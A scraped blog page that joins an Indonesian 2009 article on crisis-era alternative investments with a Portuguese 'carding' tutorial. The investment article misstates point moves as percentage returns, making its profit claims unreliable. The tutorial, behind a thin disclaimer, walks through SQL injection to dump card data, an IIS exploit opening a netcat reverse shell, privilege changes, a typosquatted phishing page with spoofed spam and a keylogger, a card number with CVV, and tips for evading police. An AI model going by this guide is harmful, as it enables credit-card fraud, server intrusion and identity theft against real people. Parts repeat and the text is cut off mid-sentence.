free download by glorious jogja

Solusi Aman di Masa Krisis

2009-02-21T19:39:00.000-08:00

Alfred Pakasi
Managing Partner Vibiz Consulting

Investasi Alternatif: Solusi Aman di Masa Krisis

Portfolio Investasi yang Tepat
Investasi dapat menjadi solusi yang tepat dalam mengatasi krisis global. Namun pertanyaannya, kemanakah alternative investasi yang tepat? Tentu saja investasi yang aman dan stabil, serta dapat diandalkan di masa krisis. Alternatif lainnya yakni investasi yang mempunyai dua potensi keuntungan, baik ketika harga sedang naik maupun harga sedang turun. Ini sudah terbukti pada krisis-krisis sebelumnya.

Investasi ada dua macam, yakni traditional investment dan alternative investment. Yang termasuk traditional investment antara lain adalah saham, obligasi dan pasar uang. Sementara itu, alternative investment juga terbagi menjadi dua: tradisional yakni forex, futures, venture capital dan property; kemudian modern antara lain hedge funds, managed futures, dan koleksi seni.

Selama terjadi krisis, pelaku pasar mempunyai reaksi yang berbeda-beda, antara lain terjadi panic selling pada pasar modal, kembali memegang cash, kehilangan kepercayaan pada pasar modal, serta mencari investasi yang safe haven, seperti emas dan US Dollar. Selain itu, marak terjadi pula unwinding carry trade dan anjloknya harga komoditas.

Akibatnya, maka terjadilah pergeseran dalam asset allocation selama krisis. Pertama, dipilih investasi yang stabil atau anti krisis, seperti property atau emas. Kedua, dipilih investasi alternatif untuk jangka pendek. Ketiga, dipilih investasi yang punya peluang keuntungan dari dua arah, misalnya futures. Keempat, orang memilih untuk memeegang uang dalam bentuk kas. Dan terakhir pada bursa saham, investasi yang diusulkan adalah pada sector defensive dan mempunyai PER rendah.

Emas, misalnya, dalam kondisi krisis sekarang, sedang berada dalam trend bullish. Per tanggal Februari, harga emas sudah naik sebesar 14.4% dan berada di sekitar level 970 dollar per troy ons. Dalam tempo waktu sebulan belakangan ini emas sudah naik 1660 poin atau artinya 1660 x modal investor, seandainya investor menaruh dananya pada emas.

Emas juga merupakan investasi yang safe haven, atau dipilih dalam kondisi risk aversion. Meskipun awalnya pergerakannya mengikuti minyak, namun ketika minyak turun lebih jauh oleh kekhawatiran outlook perekonomian global, emas justru semakin melesat.

Selain emas, trading forex (valuta asing) juga menjanjikan return yang tidak terbatas, dengan risiko yang terbatas. Forex juga punya peluang profit dari dua arah, sehingga bullish ataupun bearish tidak menjadi masalah. Contohnya, dalam kondisi Dollar yang terus menguat terhadap Euro, pair EUR/USD anjlok dari $1.4250 ke level $1.2600 hanya dalam tempo 2 bulan, atau 1650 poin, sehingga potensi keuntungan adalah 1650%. Contoh lainnya, yakni pair GBP/USD, yang juga merosot dari level $1.6672 ke level $1.3502 dalam kurun waktu 3 bulan, atau sama dengan 3170 poin, sehingga potensi keuntungannya adalah 3170%, jauh lebih besar dari EUR/USD tadi.

Stock index futures juga investasi yang menarik di tengah krisis. Indeks Nikkei, misalnya, anjlok dari level 13,440 ke 6,990 dalam waktu 3 bulan, atau 6,420 poin. Jika satu poin sama dengan Rp30,000 dan modal per lot adalah 8 juta, maka potensi laba yang dihasilkan dari modal 8 juta adalah 192.6 juta rupiah.

Menurut survei dari Merrill Lynch dan Capgemini tahun 2007, akan terjadi pergeseran alokasi investasi dari kelompok orang kaya, yang belakangan ini semakin agresif. Dari sebelumnya porsi banyak di fixed income, maka akan bergeser ke property, saham serta investasi alternatif lainnya.Sementara itu, menurut Vibiz Consulting, dengan adanya krisis pasar modal, maka alokasi pada saham akan semakin berkurang, dan proporsi yang lebih besar bergeser pada cash, property, serta investasi alternatif lainnya.

Prediksi Pergerakan Pasar
Perekonomian diperkirakan masih akan berada dalam tekanan krisis. Namun, krisis yang tadinya hanya pada sektor property dan finansial, kini juga berpengaruh ke sektor otomotif hingga sektor riil, sehingga terjadi pergeseran dari krisis finansial ke krisis ekonomi.

Sementara itu, trend dollar yang saat ini menikmati status safe haven mungkin akan berakhir. Kucuran stimulus yang butuh triliunan dollar tentunya akan semakin meningkatkan defisit yang dialami AS, sehingga dampaknya juga akan buruk bagi dollar.

Dampak dari stimulus yang dikucurkan oleh pemerintah AS setidaknya baru dapat dirasakan pada akhir tahun 2009, atau sekitar 2010. Minyak juga berpotensi untuk rebound dari level saat ini, seiring dengan pemulihan ekonomi. Carry trade juga tentunya akan kembali marak di pasar. (RP)

2009-01-24T12:05:00.002-08:00

carding

2009-01-24T12:05:00.001-08:00

.Trago a vocês um ótimo tuto carding , muito cuidado com as informações contidas aqui , não estou induzindo ninguem a fazer isso ,mas sim ostrar como os cardings agem . Quem são os carders e como eles agem. Aqui vamos começar a entender e aos poucos nos aprofundar no estudo das técnicas de carding/banking. Mas antes de entendermos isso, precisamos entender como as pessoas praticantes desssas técnicas agem. Afinal de contas, quem são os carders?Em uma explicação simples, o carder é uma variante do cracker(o hacker maligno também chamado de Black Hat) que se especializa nos golpes que envolvem cartões de crédito e dinheiro, para tirar proveito próprio usando a conta(e o dinheiro) de terceiros na qual eles lesaram. Um carder se aproveitará da maior fonte de vulnerabilidades que se possa existir. Essa vulnerabilidade não está em um kernel de linux, não está em uma versão velha do apache e tão pouco em um servidor de ssh. Essa vulnerabilidade está dentro das pessoas. Os carders também são ótimos engenheiros sociais e vão molestar o fator humano tirando proveito do mesmo até onde eles conseguirem. Desde que a engenharia social começou a se tornar um termo famoso com Kevin David Mitnick e outros como Frank Willian Abgnale, vimos que o maior rombo de segurança é a ingenuidade humana(e na qual não existe patch para correção). O carder irá explorar a ingenuidade humana, usará alguma técnica virtual(ou labial, ou ambas) fraudulenta para obter dados importantes da vitima(Tais como Rg, cpf, nome, endereço, telefone, bairro, cidade, estado, país e principalmente senhas bancárias e números de cartão de crédito do indivíduo). Após ser bem-sucedido em seu ataque, o carder terá posse de todos os dados vitais da vítima e os usará sem excrupulos ou remorso algum, efetuará varias compras com valores extremamente caros e tomando todo o cuidado possível para não ser preso. E caso ele consiga isso, terá tudo o que quiser e quem sofrerá com o prejuízo vai ser a vítima. A seguir você verá como vários ataques carders são feitos, cada detalhe. Os passos 2,3 e 4 podem te transformar em um carder habilidoso,mas vale lembrar que esse não é o objetivo dessa matéria e não me responsabilizo por nada que você venha a fazer. Nem eu e nem ninguém desse fórum. Passos iniciais de um ataque de carding. Quando o carder vai botar seus planos maliciosos em prática, a primeira coisa que ele se preocupa em conseguir sãolaranjas confiáveis.Laranjas são pessoas que normalmente conhecem o carder e são amigas dele, ou as vezes até mesmo parentes deles. Essas pessoas são as pessoas que vão ajudar o carder recebendo a encomenda(a mercadoria comprada ilegalmente pelo carder) por ele, mas sempre pedem algo em troca, seja algum presente como um celular, ou parte da quantia em dinheiro que o carder vai obter. Tendo obtido pessoas confiáveis que agam como laranjas no plano, a próxima etapa é formar um grupo carder para executar o plano em si. Há vantagens e desvantagens em se formar uma "crew" dessas.Um fato é que é extremamente difícil e trabalho(e também muito arriscado) para um carder só fazer todo o plano. Porém caso ele seja bem-sucedido em um ataque solo,ele terá apenas que pagar o(s) laranja(s) e todo o resto ficará para ele acumulando bens ilícitos em grande quantidade.Porém um carder prefere formar um grupo para executar o ataque, conseguir bastante dinheiro e assim distribuir entre eles em uma quantidade que agrade a todos, além de poder pagar os laranjas. Formado o grupo e conseguido laranjas confiáveis, o próximo passo é definir o método de ataque e assim desenvolver o planejamento. Existem vários métodos de ataques de carders, apesar de eles serem vistos detalhadamente no próximo passo, ai vai alguns: [A] Ataque Labial indireto ou direto: Ataque em que o carder consegue obter as informações vitais usando puramente engenharia social.Seja via email, telefone ou até mesmo pessoalmente se passando por uma pessoa na qual não é(falsidade ideológica, portanto crime!). Invasão de rede bancária: Obviamente o método mais trabalhoso, porém (b)não impossível(nada é impossível). Neste tipo de ataque, o carder estuda os diversos tipos de softwares usados pelo banco para controlar cadastros, informações e transações bancárias. Esse ataque ocorre quando o carder consegue invadir a rede interna de um banco, e tendo conhecimentos dos softwares, os usa para manipular o dinheiro de terceiros escolhidos aletoriamente ou a dedo, e assim transferindo o dinheiro para uma conta pirata que o carder mandou um de seus laranjas abrirem. Esse método é bem trabalhoso, pois exige tempo para contornar as defesas do banco como o sistema IDS/Honeypot, o firewall que costumam ser muito bem configurados, além do sistema de criptografia do banco ser algo realmente duro de se crackear(mas lembre-se, dificil não quer dizer impossível). [C] Exploração de vulnerabilidades em sites comercias: Um método muito utilizado. Se trata de simplesmente verificar se sites de comércio estão com alguma vulnerabilidade que permite a visualização de dados vitais de clientes, mesmo que criptografados. Um exemplo perfeito disso é um site de comércio online que esteja vulnerável a sql injection em algum campo. O carder pode ir explorando por exemplo os erros do banco de dados para descobrir nomes de suas tabelas. E depois disso, se o site permitir comandos avançados de sql, uma coisa muito perigosa poderia ser o comando sql abaixo(apenas um exemplo): Select * From 'clientes_nome' Where 'nome_completo' = '' 'or '1 = '1 Com isso o carder começa listando o nome de todos os clientes do site e em seguida... Select * From 'dados_bancários' Where 'cartao_numero = '' 'or '1 = '1 and 'senha_bancaria' = '' 'or '1 = '1 Nem preciso explicar não é? O carder acabo de listar o número dos cartões de crédito e a senha bancária dos clientes. Modificando um pouco os comandos acima, o carder pode ir acumulando as informações dos clientes como rg, cpf, telefone, endereço, etc, até que ele tenha todos os dados e se faltar algum, ele pode usar os dados já obtidos para pegar os que falta fazendo um ataque de seing(engenharia social) na própria vítima que ele está acumulando as informações. [D] Pishing e malwares: Esse é um método utilizado muito em engenharia social. Cria-se uma página perfeita e falsa de um banco(o pishing em si), mas que o cliente não desconfie. Tão perfeita que tenha os links que mande mesmo para os outros locais do site verdadeiro, tendo a malícia apenas em um dos campos(normalmente de login). Quando um usuário clica, ele irá receber uma caixa de mensagem indicando um erro, ou simplesmente ser redirecionado para uma página simples como "Limite de banda excedido, por favor tente novamente mais tarde". A pessoa não desconfia de nada e tenta novamente mais tarde. Mas assim que esse falso erro foi gerado na página falsa, um malware espião(como um keylogger ou trojan) acabou de ser instalado no computador da vítima e irá capturar tudo o que ela digitar mandando tudo via email ou ftp para o carder sem que a vítima perceba algo. Tendo escolhido o método de ataque, falta agora fazer o planejamento. E é nessa hora que um grupo ajuda, pois cada um executa uma função. Por exemplo, um programa o keylogger, enquanto o outro fica responsável pelo spam, o outro pela engenharia social, o outro pelo pishing, o outro manda um laranja abrir uma conta pirata, e assim por diante. Nó próximo passo você terá explicações mais avançadas, além de vc vários casos de ataques carders envolvendo pequenos contos. Esses contos sim são verdadeiros, porém o nome dos atacantes e das vítimas foram trocados para evitar frustrações. Fique atento, pois será no passo seguinte que você verá detalhadamente cada ataque carder em andamento. Métodos de ataque mais comuns e planejamento avançado: Aqui você verá contos(verdadeiros apesar dos nomes fictícios dos personagens) que mostrarão com detalhes cada ataque de forma separada. Nesse passo que você verá realmente como os carders agem. Caso 1: Vulnerabilidades em sites comerciais Um carder, vou chamar ele de Rafael aqui, está louco para comprar aquele lindo Notebook com tecnologia dual core, rede wireless, placa de vídeo de 512MB e 4GB de ram que vem com a distro linux Debian embutida, mas essa belezinha custa exatamente R$8.000,00. Rafael não está no momento com seus amigos por perto, todos estão no interior do Estado viajando(tudo está se passando em São Paulo - SP). Como não há como fazer um ataque lá muito sofisticado, Rafael decide procurar por brechas de segurança em sites comerciais espalhados pela internet. Um meio mais fácil e rápido para conseguir uma graninha, que no caso, Rafael está precisando muito. Ele liga seu computador localizado no canto de seu quarto, se trata de uma máquina com uma banda larga realmente boa(8mb de velocidade) e rodando um linux Fedora 4. Ele abre seu navegador konqueror e acessa a página no google. Rafael está pensando em uma string bem inteligente para mandar o google pesquisar sobre sites comerciais. Mercado livre não seria uma boa opção nesse momento, então ele pensou:"Hmm...sites de pet shops online costumam vender coisas por cartão, e sua segurança não é lá muito boa..." Ótima idéia, Rafael envia a seguinte string no formulário do google: allinurl: "pet shop nacional" Com isso, vários sites de pet shops brasileiros são "cuspidos" na tela assim que Rafael clica no botão "pesquisar" Rafael faz uma lista razoável dos principais sites retomados em um editor de texto simples do linux(no caso ele usou o vi direto do terminal). Então ele abriu seu scanner nessus. Como tanto o servidor e o cliente gráfico estão na mesma máquina(ou seja, operando puramente em localhost), Rafael conecta rapidamemte no seu servidor. Ele manda o nessus scannear apenas as portas 80(http) e443(https). Com isso, os scans não serão tão demorados. Na parte de plugins, ele habilita os testes relacionados a servidores web(webservers) e banco de dados(database) apenas. Isso fará com que o nessus descubra furos em servidores web que permitam possivelmente uma invasão e também checará falhas no ssl(secure socket layer) do site, a fim de testar a segurança da criptografia de dadose por último testar falhas de sql injection no site. Nos três primeiros sites, Rafael não conseguiu nada. Mas no quarto o nessus acusou que uma falha potencialmente perigosa permitiria um invasor obter acesso não autorizado no servidor. Esse se tratava de uma máquina Windows 2000 SP 4, com IIS 5.0 e possivelmente vulnerável. Rafael quis ter mais certeza, então usou o nmap com os seguintes argumentos em seu terminal(ele executou os comandos como root): # nmap -sV -O -P0 -vv www.site-possivelmente-vulneravel.com.br E analisando a saida ecoada em seu terminal, era exatamente isso que o nessus havia dito TCP/80 OPEN - Microsoft IIS 5.0 TCP/443 OPEN - Microsoft IIS 5.0 (Secure_Socket_Layer) Device type: General purpose. Running: Windows NT/2K/XP OS Detaisl: Windows 2000 SP4 Otimo, agora basta procurar o exploit certo e Rafael poderá ter grandes chances de invadir o servidor web. O nessus também acusou que a criptografia do ssl era possivelmente falha, o que não dará muitos problemas para Rafael se ele tiver que na hora crackear alguma coisa. Ele começa acessando o security focus(www.securityfocus.com) e procura por IIS 5.0 na barra de search(pesquisar). Logo ele encontra um bid(Bugtrack ID) que fala a respeito de um estouro de buffer na qual se obtem uma shell remotamente por connect back. Ele clicou na aba exploit e havia o exploit disponível em C, e o melhor que era um exploit que se compila no linux, ele baixou o exploit e executou o seguinte comando no terminal: # gcc -o hell iishack2000.c Isso gerou um arquivo binário chamado hell. Rafael executou simplesmente: ./hell e as seguintes instruções ecoaram no seu terminal: [banker-sys01@root]# ./hell usage: ./hell Shell_Port significa que Rafael terá que deixar uma porta escutando em seu computador para receber uma shell, e your_ip rafael terá que inserir seu ip real que é 201.142.23.88. Ele abre outro terminal(agora como usuário normal) e digita: $nc -l -vv -p 1500 Ele deixa a porta tcp 1500 escutando com o netcat(nc). Agora no terminal que esta como root, ele volta a executar o exploit: ./hell www.site-possivelmente-vulneravel.com.br 80 201.142.23.88 1500 O exploit manda Rafael aguardar e enquanto isso ele reza para que o servidor não esteja patcheado. Ele recebe a última mensagem do exploit na tela: [+] Sucefull! Check the specified tcp port Ele abre o outro terminal e ve o seguinte: $nc -l -vv -p 1500 connected from site.....bla bla bla [root1@root]# Yeah! Não estava patcheado e agora Rafael tem acesso root(super usuário, raiz) no sistema. Ele nao tem objetivo de fazer deface, e sim localizar aquele banco de dados que o nessus achou no site, mas que não estava vulnerável a sql. Ele localizou um backup dele em C:\WINDOWS\Temp, com o nome de users_db.mdb. Só que há dois problemas: (1-) Rafael não está no Windows para abrir arquivos do acess(.mdb). (2-)Não há um meio simples de se transferir o arquivo para sua máquina Rafael faz um teste com o nmap para saber se o servidor de ftp está rodando no servidor, e por sorte, anonymous pode ser acessado usando login anonymous e um email qualquer como senha, mas é em vão, pois anonymous não pode baixar arquivos de nenhum diretório importante do sistema. A saída então é tentar obter um usuário com mais privilégios no ftp ou achar outro meio de obter o backup do banco de dados. Mas como ele fará isso? Simples, ele ja está com acesso administrativo em uma shell graças ao exploit, então ele simplesmente adiciona o usuário anonymous ao grupo administrativo do servidor para que ele tenha acesso a todos os diretórios do sistema. Ele usa o seguinte comando na shell remota: C:\> net localgroup /add anonymous Uma mensagem mostra que ele foi adiciona com sucesso ao grupo administrativo. Rafael volta a se conectar no ftp como anonymous(só que agora com privilégios de admin) e dois comandos são o sulficiente para a sua alegria: cd %SystemRoot%\Temp get users_db.mdb Ótimo! Está feito! Rafael disconecta do ftp e agora ele tem o backup de todo o banco de dados do site comercial, cheio de informações valiosas. Mas ainda um problema persiste, ele não está em um Windows para abrir arquivos do acess. Ele então liga para um de seus amigos torcendo para que ele esteja em casa, seu amigo é Marcos, ele também é um carder. Acompanhe o diálogo pelo telefone: R: "Ei Marcos, preciso de sua ajuda cara." M: "Hmmm....o que seria Rafael?" R: "Peguei um arquivo interessante do acess, mas estou no linux e não posso abrir ele. Você está com windows ai?" M: "Sim, o XP." R: "Está com o office nele?" M: "Com o 2003." R: "Otimo, se não estiver ocupado, entre agora em irc.fullnetwork.org canal #full, vou te passar o arquivo em pvt." M: "Ok, estou conectando já." Eles desligam em um canal de irc, Rafael passa o arquivo para ele. Agora acompanhe o dialogo pelo irc. Rafael está usando o apelido D4RK_D3V1L e Marcos simplesmente D4D3. Ha um problema. O que houve? O arquivo está com senha. Vou ter que fazer brute force nele. Ok, faça assim então. Quebre a senha dele e me mande uma copia sem senha para o meu email assim que conseguir amanhã. Ok, vou fazer isso cara. Cara...Valeu mesmo, se esse lance der certo eu reparto o lucro com vc Vou dormir um pouco agora, estou morto. Beleza cara valeu. Vou deixar o brute rodando aqui e vou descansar um pouco também. No dia seguinte, Rafael pediu para usar a maquina windows do seu vizinho e levando um cd virgem, checa o email e havia uma nova mensagem de Marcos. Estava anexado o arquivo do banco de dados e havia a seguinte mensagem: "Consegui cara, a senha para acessar o banco de dados é: $#!@hp40gksm046$#@! Pelo o que deu pra ver você se deu bem, tem card pra caramba ai, além de outras infos hehe Não se esqueça minha parte, afinal eu ajudei hehe. Abraços, Marcos." Rafael ficou tenso, a adrenalina subiu e ele acessou o banco de dados finalmente. Ele viu dezenas de clientes com informações bancárias completas. ele grava em cd, apaga o que ele tinha baixado no hd do vizinho, sai do seu email, agradece e volta para casa. Ele está com a adrenalina disparada, ele volta para a casa e a primeira coisa que ele faz é ligar para Aline. Aline é uma antiga amiga dele que se oferecia como laranja em seus planos carders em troca de um presentinho ou uma quantidade boa de grana. Acompanhe o segundo dialogo no telefone: A: "Alô?" R: "Oi Li..." A: "Rafa! Beleza querido?" R: "Beleza pura hehe. Consegui uns cards quentes para nós. E ai? Topa se arriscar mais uma vez?" A: "Hmm...se você não esquecer da minha parte eu topo sim rs rs." R: "Tudo o que quiser meu anjo. Apenas me diga o que quer." A: "Hmm...Estou a fim daquele ipod que a gente viu no shopping naquela tarde lembra?" R: "Lembro sim. Fechado. Vou testar os cartões em local seguro. Se ocorrer tudo bem, posso mandar entregar ai?" A: "Sim, só que antes tenha certeza que não vão pegar a gente." R: "Claro, até mais tarde então Li." Rafael vai em um cyber café em outro bairro(tomando onibûs para isso), pois nisso ja dificulta o rastreamento. Não é sábio usar um cyber café ou lan house muito perto de sua casa, principalmente se o cadastro for obrigatório. Ele põe uma hora em uma máquina mais escondida ao fundo da sala, acessa o cd e assim o banco de dados. Agora ele precisa testar logo pelo menos um cartão para ver se está tudo bem e assim poder efetuar compras melhores. Ele escolhe a dedo uma vítima do banco de dados, com as seguintes informações: Nome: Maria Fernanda Galante Nome impresso no cartão: M FERNANDA GALANTE Número do cartão: 4532117021980223 Validade do Cartão mês: 12 / ano: 7 Código de Segurança do Cartão 023 BANCO BRADESCO S.A. Ele entra em um site pornográfico e faz a compra de um vidro de viagra e manda entregar na casa de um velho chato que mora em sua rua para sacanear ele, ao ver que o cartão está funcionando. Ao ver que sim, ele testa pelo menos mais uma duzia de cartões do banco de dados e ao ver boas respostas de todos, ele começa a fazer montes e montes de comprar como seu notebook, o ipod de aline, um mp4 para Marcos que ajudou, entre outras coisas. Ele sai de sua maquina, pega seu cd e sai como se nao tivesse feito nada demais, ninguem desconfiou ou ficou prestando atenção no que ele estava fazendo. Ele pagou sedex para que tudo chegue bem logo. Ele entra em um site pornográfico e faz a compra de um vidro de viagra e manda entregar na casa de um velho chato que mora em sua rua para sacanear ele, ao ver que o cartão está funcionando. Ao ver que sim, ele testa pelo menos mais uma duzia de cartões do banco de dados e ao ver boas respostas de todos, ele começa a fazer montes e montes de comprar como seu notebook, o ipod de aline, um mp4 para Marcos que ajudou, entre outras coisas. Ele sai de sua maquina, pega seu cd e sai como se nao tivesse feito nada demais, ninguem desconfiou ou ficou prestando atenção no que ele estava fazendo. Ele pagou sedex para que tudo chegue bem logo. No dia seguinte, ele liga novamente para Aline e ela confirmou que as entregas ja vinham chegado e que vinham de varias lojas diferentes. Ele pega seu carro e foi para a casa de Aline que é razoavelmente longe. Ele pega tudo e Aline diz que para ele ficar com o ipod até passar umas semanas, pois a policia federal vai investigar com certeza, então quando tudo passar, ele da a ela o ipod. Ele concorda, checa se nenhum pacote está grampeado, e volta para casa. Alguns dias depois a policia bate na casa de Aline, interroga, investiga e não acha nada. Uma semana depois disso Rafael entrega o ipod a ela e novamente agradece a ajuda. Como não havia provas contra Aline e Rafael fez tudo corretamente para que não fosse rastreado, nem sequer enquadrado como suspeito, dessa vez o carding foi bem sucedido. O que o leitor deve captar é as "manhas", nunca fazer de casa, usar uma lan bem longe de onde vc mora, assim como os laranjas que vc confia. O básico do anonimato(proxy + apagamento de logs) e ainda testar o cartão em coisas bestas antes de fazer uma compra importante para nao perder tempo. Caso seja necessário cadastro, fazer um falso nem que tenha que forjar um rg todo para isso em uma lan house ou cyber café. Esse foi um dos contos, foi um até que simples, mas há mais manhas a serem aprendidas e os próximos contos se encarregarão de mostra-las. Caso 2: Atacando em grupo. Aqui é um caso totalmente diferente com personagens diferentes. Um carder adolescente chamado Erick recebeu uma ligação de Eduardo, um conhecido de seu primo. Acompanhe o dialogo: Er "Alô, aqui é o Erick. Quem fala?" Ed "Oi Erick. Aqui é o Eduardo amigo do seu primo que trabalha com ele na firma. Lembra de mim?" Er "Claro que sim Eduardo. Aconteceu alguma coisa?" Ed "Gostaria de fazer um acordo com você. O patrão negou aumento para o seu primo e para mim. Tem que como você dar uma lição nele?" Er "Não de graça..." Ed "Certo. Diga o seu preço. Mas quero que de algum prejuízo a ele. Algo financeiro." Er "Estou com muita vontade de pegar um playstation 3. De resto, ele estará em minhas mãos." Ed "Fechado." Er "Ok, vou começar a esquematizar o plano para ferrar esse imbecil. Te ligo assim que conseguir algo." Ed "Feito. Ate mais tarde então." Er "Até Ed." Agora Erick tem motivos para executar um ataque não-ético. Ele não faz isso apenas para ter o seu playstation 3, mas sim também para vingar seu primo que trabalha muito naquela firma e com certeza merecia um aumento. Erick começa ligando para o seu primo, explica o que Eduardo lhe disse, explica que planeja vingança contra o patrão, só que ele precisava de informações, então fez algumas perguntas bem elaboradas para o seu primo, e o mesmo respondeu facilmente todas elas. Erick consegue as seguintes informações: Nome do patrão: Marcelo Wander Vendelli. Idade: 46 anos. Descrição física: Olhos castanhos, calvo, cabelos negros, 1,83cm de altura, 76 kg, etnia caucasiana. Hobies: Orkut, Futebol, Carros, Sinuca, Jogos de cartas, festas. Conhecimento sobre segurança de computadores: Muito baixa. (...) Email: Marcelo@vitima.com.br Essas informações já ajudaram bastante, Erick avisa o seu primo que se obter sucesso voltaria a ligar. Erick já pensou em um plano bem interessante para executar contra o que ele julga ser "o filho da p%$@ mais mão-de-vaca do mundo", mas ele não pode executar esse plano tão engenhoso sozinho. Então ele precisa arrumar uma crew logo, e ele já sabe quem chamar: Dennis, Rodrigo e Walter. Esses já são seus amigos e parceiros de hacking/carding de Erick a alguns anos e são pessoas que ele pode confiar. O melhor de tudo é que eles moram a poucos quarteirões da casa de Erick. Mas é óbvio que é muito mais sábio verificar se eles estão disponíveis no irc para marcar um local na qual possam planejar o ataque de modo tranquilo antes do que ir na casa de cada um sem saber se estão fazendo outra coisa. Erickl iga seu computador, está rodando Windows XP nada demais, mas Erick arruma um jeito caso precise operar algum Unix ou Linux para executar alguma tarefa. Ele conecta no seguinte servidor e no seguinte canal: Servidor:irc.fullnetwork.org Canal:#fullEssa rede é um dos pontos de encontros principais de carders/bankers de todo o país. Ao se conectar, Erick fica feliz em ver os três onlines e aparentemente "sem porcaria nenhuma para fazer". Erick em pvt(abreviação de private, que seria uma janela de conversa entra apenas duas pessoas no irc) passa aos três o seguinte endereço: Conectem nesse canal agora, tenho algo importante para lhes contar: #Erick_Carder_Crew Ótimo, todos se encontram em outro canal do servidor agora, apenas os quatro. Assim, eles podem ficar mais a vontade enquanto discutem como vai ser o plano. Erick conta a eles o que aconteceu, como pretende se vingar e pergunta se poderia ser na casa de um deles para que eles discutissem como seria o plano, o armassem e por fim, o colocariam em prática, claro que todos serão recompensados(o leitor já sabe como...). Walter sugere a casa dele, já que seus país estão trabalhando e eles terão paz para fazerem o que der na telha la dentro. Então combinaram todos de se encontrar na casa de Walter as duas da tarde. Enquanto isso, Erick disconecta, pega um caderno e vai fazendo pequenos diagramas e rascunhos de como será o plano(que desculpas usar, que ferramentas usar, como convencer a vítima, etc). Chegando a hora, todos se encontram na casa de Walter, estão com máquinas, cadernos e o que mais eles queriam, uma sala calma só com eles quatro para discutirem da melhor forma o seu plano. Erick começa passando as informações que ele obteve do patrão para todos os outros. Eles decidem que vai ser uma combinação de pishing + um keylogger, seguido de spam e engenharia social. Dennis ficará a cargo de criar a engenharia social, Rodrigo como é um programador avançado, ficará a cargo de criar o programa keylogger espião, Walter é um webmaster, então irá se encarregar de criar o pishing(a página falsa em si), e por fim, Erick vai coletar mais informações úteis, contatar laranjas, criar uma conta em um banco falsa e por fim enviar o spam. Caso sejam bem sucedidos, executarão as compras. Erick liga para o patrão de seu primo a fim de fazer uma engenharia social para descobrir o sistema operacional da vítima. Acompanhe o diálogo: E: "Boa tarde. Sou Vinicius da Rocha Oliveira do suporte técnico da microsoft brasileira. Com quem eu falo por favor?" M: "Marcelo..." E: "Senhor Marcelo, desculpe incomoda-lo mas é que gostaríamos de avisar o senhor que não deverá atualizar seu sistema Windows no momento. Uma atualização do Internet Explorer no Windows XP está danificando o kernel do sistema. Se o senhor usa Windows XP Profissional SP 2, aguardo que espere a atualização do mês seguinte. O senhor usa Windows XP?" M: "Não. Não uso nenhum Windows. O sistema do meu computador de casa é um Linux." E: "Linux? Espere ai isso está errado. O senhor não é Marcelo Alvaro Melo?" M: "Não, me chamo Marcelo Wander Vendelli." E: "Ahn Deus, isso foi um terrível engano. Estamos tentando contatar outro Marcelo. Perdoe-nos pelo incomôdo. Tenha uma boa tarde senhor." M: "Tudo bem, acontece. Tchau, boa tarde para você também." Erick descobre algo inesperado e conta para os outros. O sistema desse cara é linux e não windows, então eles vão ter que criar o keylogger em Kylix* ao invés de usar Delphi. *: Linguagem de programação idêntica ao delphi para linux. Agora Erick tem mais uma coisa a fazer, contatar um laranja que receba as mercadorias que vai ser o prêmio do pessoal por ter ajudado. Ele fará agora sua segunda ligação para contatar um velho amigo chamado Luis que já atuou de laranja em outros ataques de Erick. Veja como foi a conversa: L: "Alo, aqui é o Luís. Quem fala?" E: "Ei cara tudo bem? Aqui é o Erick. Conseguiu aquela tv de plasma que você estava querendo?" L: "Opa! E ai meu brother beleza? Não cara, ainda não consegui." E: "Bom eu e os caras estamos fazendo um plano ai e preciso de sua ajuda. Se for bem-sucedido, a gente vai conseguir muita coisa e eu te arranjo a tv. Mas a gente precisa de local para a entrega. Local que aqueles pfs filhos da p%¨$# não nos peguem." L: "Bom cara, se vocês tiverem certeza que conseguiram, pode mandar vir aqui que eu recebo na boa." E: "Beleza cara. Obrigado. Te ligo mais tarde então." L: "Beleza, até." Então foi decidido que a engenharia social ira se basear em um equipamento de carro tentador(já que os carros são uma das paixões da vítima). O keylogger e a página começam a ser montados, a página é um clone perfeito do mercado livre. Ao fim da tarde, o keylogger e a página estão hospedadas em um domínio falso(eles forma em uma lan e fizeram cadastro falso para hospedar o página e o keylogger) chamado de http://www.mercodolivre.com.br/produto=id8995 Notaram a artemanha? Está escrito mercodo ao invés de mercado. Uma simples troca de letra deixa um domínio novo, porém é um detalhe que a vítima percebe a acaba caindo. Agora Erick vai enviar o spam(ainda da lan) usando a engenharia social que Dennis armou. A engenharia ficou assim: Prezado(a) Usuário(a): Confira a nossa super oferta para bancos de couro em automóveis! Quatro acabamentos completos por apenas R$780,00! E pagando a vista, você receberá até 30% de desconto! Uma oferta imperdível para os amantes de automóveis que queiram ter seu carro confortável e com boa aparência! Mais detalhes: http://www.mercodolivre.com.br/produto=id8995 Grato! -Equipe Mercado Livre. Para mandar o spam, Erick se utilizará do aplicativo padrão dos sistemas Windows, o Outlook Express, e o servidor a ser usado é o servidor de email da yahoo. Ele abre o aplicativo e vai em Ferramentas > Contas > Adicionar > Email. Ele digita no nome Mercado Livre. No próximo campo ele insere noticias@mercadolivre.com.br. No próximo campo ele escolhe a forma POP3 de autenticação. Como servidor smtp ele coloca smtp.mail.yahoo.com.br e como servidor pop3 ele adiciona pop.mail.yahoo.com.br. No próximo campo ele deve inserir uma conta verdadeira, seu email da yahoo é Erick_abcd@yahoo.com.br e sua senha é hy65j$%$23d356Gfh56¨%. Ele coloca login como Erick_abcd e sua senha logo em seguida. Pronto! O email falso está criado. Agora ele volta em Ferramentas > Contas e define o email recem-criado como padrão. E depois clica na conta recem-criada e vai em propriedades > servidor. Marca a opção "Meu servidor requer autenticação" e da ok. Agora ele pode mandar emails falsos. A página funciona assim: Assim que a pessoa clica, vai aparecer uma pagina idêntica ao do mercado livre, assim que ela clica em prosseguir aparece a mensagem: "É necessário um plugin para visualizar a página corretamente. Deseja instalá-lo agora?" Assim que ela clica em sim, o keylogger se aloja na computador da vitima e manda a pessoa tentar novamente, mas ai da um erro como "limite de banda excedido, tente novamente mais tarde." Ele envia a mensagem para a vítima e voltam para casa. Três dias depois eles vão em outra lan, fazem um cadastro falso e checam para ver se a vítima caiu no truque. Bingo! Todos os seus dados estão lá. Eles fazem dezenas de comprar e mandam entregar na casa do laranja contatado por Erick. São dezenas de notebooks, tvs, ipods, mp4, etc. Eles voltam para casa. Três dias depois eles vão em outra lan, fazem um cadastro falso e checam para ver se a vítima caiu no truque. Bingo! Todos os seus dados estão lá. Eles fazem dezenas de comprar e mandam entregar na casa do laranja contatado por Erick. São dezenas de notebooks, tvs, ipods, mp4, etc. Eles voltam para 